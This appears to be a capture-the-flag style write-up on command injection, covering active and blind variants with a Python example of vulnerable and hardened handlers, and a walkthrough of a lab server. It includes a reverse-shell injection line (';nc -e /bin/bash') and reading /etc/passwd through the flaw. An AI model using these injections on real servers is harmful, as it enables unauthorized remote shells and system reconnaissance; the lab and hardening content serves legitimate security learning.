Command Injection occurs when server-side code (like PHP) in a web application makes a system call to the host machine. It is a web vulnerability that can allow an attacker to run system commands on the server.
;nc -e /bin/bash - a reverse shell that takes advantage of a target system's vulnerabilities to initiate a shell session and access the victim's system.
Blind Command Injection - occurs when the system command made to the server does not return the response to the user in the HTML document.
We can detect Active Command Injection by seeing responses from the system call.
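The active and blind cases described above, as an added example that is not part of the original write-up. It assumes a hypothetical greeting handler; the function names and the harmless "echo INJECTED" marker are constructed for illustration. The injectable form is shown beside a hardened form that validates input and never invokes a shell.

```python
import re
import subprocess

# Allow-list for the hypothetical "name" parameter (assumption for this example).
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,32}")

BENIGN = "alice"                # constructed sample input
PROBE = "alice; echo INJECTED"  # constructed, harmless marker instead of a payload

def vulnerable_active(name):
    """Input is concatenated into a shell string and the output is returned."""
    proc = subprocess.run("echo Hello " + name, shell=True,
                          capture_output=True, text=True)
    return proc.stdout

def vulnerable_blind(name):
    """Same flaw, but the command output never reaches the response."""
    subprocess.run("echo Hello " + name, shell=True, capture_output=True)
    return "Request received"

def run_without_shell(name):
    """Pass input as one argv element; no shell parses the metacharacters."""
    proc = subprocess.run(["echo", "Hello", name],
                          capture_output=True, text=True, check=True)
    return proc.stdout

def hardened(name):
    """Validate against the allow-list first, then run without a shell."""
    if not SAFE_NAME.fullmatch(name):
        raise ValueError("rejected input")
    return run_without_shell(name)

if __name__ == "__main__":
    # Active: the second command's output shows up in the response.
    print(repr(vulnerable_active(PROBE)))
    # Blind: the response is identical for benign and injected input.
    print(vulnerable_blind(BENIGN) == vulnerable_blind(PROBE))
    # No shell: the semicolon is printed as plain data.
    print(repr(run_without_shell(PROBE)))
    try:
        hardened(PROBE)
    except ValueError as exc:
        print("hardened:", exc)
```

In the blind case the response gives a defender nothing to compare, so detection has to rely on server-side evidence such as process or request logs rather than the returned page.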
Practical
We are first greeted with the vulnerable website, http://10.10.29.177/evilshell.php.
http://10.10.29.177/evilshell.php
From here, we are able to use various commands to find files and who is on the system. To answer the first question, I used the command "ls" to list all the folders in the current directory.
drpepper.txt
The strange file I found in this case was "drpepper.txt", which, when read, reads "I love Dr Pepper".
I love Dr Pepper
To find who the user is, I used the "whoami" command.
whoami
Using "cat /etc/passwd", we are able to analyze the output and see that the user's shell is set to "/usr/sbin/nologin".
/usr/sbin/nologin
To find the Ubuntu version, I used the command, "lsb_release -a".
Ubuntu 18.04.4
To find the MOTD, we can use the command, cat /etc/update-motd.d/00-header.